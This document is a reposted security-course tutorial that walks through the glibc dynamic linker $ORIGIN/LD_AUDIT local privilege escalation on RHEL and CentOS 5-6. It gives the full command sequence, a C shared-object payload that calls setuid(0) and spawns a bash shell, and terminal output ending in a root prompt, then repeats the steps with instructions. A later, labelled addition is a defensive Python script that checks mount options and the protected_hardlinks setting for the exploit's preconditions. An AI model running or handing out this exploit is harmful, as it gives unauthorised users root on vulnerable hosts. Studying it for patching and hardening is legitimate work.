Web Security Chapter 6, Privilege Escalation Part 03: GNU C library dynamic linker $ORIGIN overflow privilege escalation
Uses the /tmp directory permissions, setuid permissions and a small C program to escalate an ordinary account to root.
Works on RHEL5-RHEL6 and CentOS5-CentOS6.
Privilege escalation procedure
[moonsec@localhost tmp]$ mkdir /tmp/exploit
[moonsec@localhost tmp]$ ln /bin/ping /tmp/exploit/target
[moonsec@localhost tmp]$ exec 3< /tmp/exploit/target
[moonsec@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target
[moonsec@localhost tmp]$ rm -rf /tmp/exploit/
[moonsec@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target (deleted)
[moonsec@localhost tmp]$ cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
[moonsec@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[moonsec@localhost tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 moonsec moonsec 4223 Dec 19 06:10 /tmp/exploit
[moonsec@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@localhost tmp]# whoami
Create the directory:
mkdir /tmp/exploit
Create a hard link to the target file:
ln /bin/ping /tmp/exploit/target
Load the target file into memory (hold it open on file descriptor 3):
exec 3< /tmp/exploit/target
Check how target looks in memory:
ls -l /proc/$$/fd/3
Delete the directory:
rm -rf /tmp/exploit/
Enter the C code:
cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
Compile the file:
gcc -w -fPIC -shared -o /tmp/exploit payload.c
Escalate to root:
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
CentOS 5.5: user moonsec escalated to root.
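The procedure above depends on two host conditions: an unprivileged user must be able to hard-link a setuid binary into /tmp, and a shared object dropped there must be mappable as executable. The following hardening check is an added example, not code from the original post; it reads constructed /proc/mounts and sysctl output (the function names, sample mounts and sysctl values are assumptions) and reports which of those conditions hold.

```python
# Added hardening check, not from the original post: parses constructed
# /proc/mounts and sysctl output for the preconditions of the technique above.

# Constructed sample: /tmp lives on the root filesystem together with /bin.
SAMPLE_MOUNTS = """\
/dev/mapper/vg-root / ext4 rw,relatime 0 0
proc /proc proc rw 0 0
/dev/sda1 /boot ext4 rw,relatime 0 0
"""
SAMPLE_SYSCTL = "fs.protected_hardlinks = 0\n"


def parse_mounts(text):
    """(mountpoint, device, option set) for each line of /proc/mounts."""
    mounts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 4:
            mounts.append((parts[1], parts[0], set(parts[3].split(","))))
    return mounts


def mount_for(path, mounts):
    """Longest-prefix match: the mount entry that contains `path`."""
    hits = [e for e in mounts
            if path == e[0] or path.startswith(e[0].rstrip("/") + "/")]
    return max(hits, key=lambda e: len(e[0])) if hits else None


def parse_sysctl(text):
    """'key = value' lines (sysctl -a style output) into a dict."""
    return {k.strip(): v.strip() for k, sep, v in
            (line.partition("=") for line in text.splitlines()) if sep}


def assess(mounts_text, sysctl_text, suid_dir="/bin", scratch="/tmp"):
    mounts = parse_mounts(mounts_text)
    tmp, binm = mount_for(scratch, mounts), mount_for(suid_dir, mounts)
    # Hard links cannot cross filesystems, so a separate /tmp mount alone
    # defeats the `ln /bin/ping /tmp/exploit/target` step (device compare).
    same_fs = tmp is not None and binm is not None and tmp[1] == binm[1]
    # fs.protected_hardlinks (Linux 3.6+) forbids linking files the caller
    # cannot write to; it is absent on the RHEL5/6 kernels named above.
    hl = parse_sysctl(sysctl_text).get("fs.protected_hardlinks")
    return {
        "hardlink_to_suid_possible": same_fs and hl != "1",
        "protected_hardlinks": hl,  # None when the kernel does not offer it
        "tmp_noexec": tmp is not None and "noexec" in tmp[2],
        "tmp_nosuid": tmp is not None and "nosuid" in tmp[2],
    }
```

On a real host, feed it the contents of /proc/mounts and the output of `sysctl fs.protected_hardlinks`; a `True` for `hardlink_to_suid_possible` means the first step of the procedure is still open to any local user.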
Original article, author: mOon. If reposting, please cite the source: https://www.moonsec.com/archives/398